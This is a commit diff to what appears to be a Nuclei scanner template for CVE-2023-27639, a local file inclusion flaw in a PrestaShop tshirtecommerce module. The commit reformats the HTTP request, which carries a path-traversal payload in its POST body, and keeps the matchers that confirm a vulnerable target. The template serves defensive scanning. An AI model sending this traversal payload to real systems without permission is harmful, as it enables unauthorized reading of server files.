req type update /CVE-2023-27639.yaml
parent
5888552648
commit
6a53c0e3ec
|
@ -21,13 +21,12 @@ info:
|
|||
tags: cve,cve2023,prestashop,tshirtecommerce,lfi
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
POST /tshirtecommerce/ajax.php?type=svg HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
url=.%2F..%2Fvendor%2Fjdorn%2Fsql-formatter%2Fexamples&file_name=examples.php
|
||||
- method: POST
|
||||
path:
|
||||
- "{{BaseURL}}/tshirtecommerce/ajax.php?type=svg"
|
||||
headers:
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
body: "url=.%2F..%2Fvendor%2Fjdorn%2Fsql-formatter%2Fexamples&file_name=examples.php"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
@ -41,4 +40,5 @@ http:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# digest: 4a0a004730450220647b65a849a4090a84298be08ca6498711f75574b41b8b9852f353fa29e5bd43022100f04884728c2b7404923d6f8f72c8c03f9276cb82618b29731688cadbf7a3507f:922c64590222798bb761d5b6d8e72950
|
||||
|
||||
# digest: 4a0a004730450220647b65a849a4090a84298be08ca6498711f75574b41b8b9852f353fa29e5bd43022100f04884728c2b7404923d6f8f72c8c03f9276cb82618b29731688cadbf7a3507f:922c64590222798bb761d5b6d8e72950
|
||||
|
|
Loading…
Reference in New Issue